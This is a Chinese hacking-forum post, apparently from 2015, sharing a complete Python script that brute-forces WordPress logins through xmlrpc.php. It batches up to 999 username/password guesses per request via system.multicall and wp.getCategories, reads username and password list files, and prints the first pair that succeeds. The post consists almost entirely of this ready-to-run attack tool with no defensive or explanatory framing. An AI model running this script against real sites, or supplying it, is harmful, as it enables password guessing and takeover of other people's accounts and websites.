查看: 11996|回复: 0

xmlrpc暴力破解脚本

[复制链接]
  • TA的每日心情

    昨天 20:03
  • 签到天数: 1626 天

    [LV.Master]伴坛终老

    发表于 2015-10-11 22:29:02 | 显示全部楼层 |阅读模式
    90sec@C4

    [Java] 纯文本查看 复制代码
    # coding=utf-8
    # author:c4bbage@qq.com
    # weibo:[url=http://weibo.com/s4turnus]http://weibo.com/s4turnus[/url]
     
    import requests
    import httplib
    import urlparse
    import io
    import argparse
     
     
    def post(host, pl, port=80,  path='/xmlrpc.php'):
        postHead = {"Host": host, "User-Agent": "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0、c4bbage@weisuo", "X-Forwarded-For": host, 'Content-Type':
                    'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Connection': 'keep-alive'}
        postcontent = '''<?xml version="1.0"?>
            <methodCall><methodName>system.multicall</methodName> <params><param><value><array><data>[pl]     </data>
            </array>   </value>    </param>    </params>    </methodCall>
            '''
        resultHtml = httplib.HTTPConnection(host.split(":")[0], port, False)
        resultHtml.request(
            'POST', path, body=postcontent.replace('[pl]', pl), headers=postHead)
        page = resultHtml.getresponse()
        pageConect = page.read()
        return pageConect
     
     
    def main():
        parser = argparse.ArgumentParser(
            description='wordpress brute force tool. This is a multi-group account password request. A request Riga one thousand group account password no problem. Xmlrpc will log a few logs.. \nby c4bbage [url]http://weibo.com/s4turnus'[/url])
     
        parser.add_argument('-t',
                            action="store",
                            dest="url",
                            required=True,
                            help='exp: -t [url]http://weisuo.org/xmlrpc.php'[/url]
                            )
        parser.add_argument('-u',
                            action="store",
                            dest="userfile",
                            required=True,
                            help='exp: -u username.txt',
                            type=argparse.FileType('r')
                            )
        parser.add_argument('-p',
                            action="store",
                            dest="pwdfile",
                            required=True,
                            help='exp: -p password.txt',
                            type=argparse.FileType('r')
                            )
     
        args = parser.parse_args()
        url = urlparse.urlparse(args.url)
        userfile = args.userfile
        pwdfile = args.pwdfile
        if(url.netloc.index(':') > 0):
            urlport = url.netloc.split(":")[1]
        else:
            urlport = 80
        # 每个请求999组账号密码
        t = 999
        users = userfile.readlines()
        pwds = pwdfile.readlines()
        pl = '''
        <value><struct><member>
            <name>methodName</name>
                <value><string>wp.getCategories</string></value>
                </member>
            <member>
            <name>params</name>
            <value><array><data>
                <value><string>1</string></value>
                <value><string>[username]</string></value>
                <value><string>[pwd]</string></value>
            </data></array></value>
        </member></struct></value>'''
     
        up = [[u.strip(), p.strip()] for u in users for p in pwds]
        i = 0
        apl = ''
        while i <= len(up) / t:
            apl = ''
            s = i * t
            for a in up[s:s + t]:
                apl += pl.replace('[username]', a[0]).replace('[pwd]', a[1])
                pass
            res = post(host=url.netloc, port=urlport, pl=apl, path=url.path)
            #   提取结果
            if(res.find("categoryDescription") > 0):
                rr = 0
                for r in res.split("</struct></value>"):
                    if(r.find("categoryDescription") > 0):
                        print up[s:s + t][rr] 
                        # 成功后退出
                        exit()
                        pass
                    rr += 1
            i += 1
            pass
     
    if __name__ == '__main__':
        main()


    12311.png
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-1 23:32 , Processed in 0.035481 second(s), 15 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部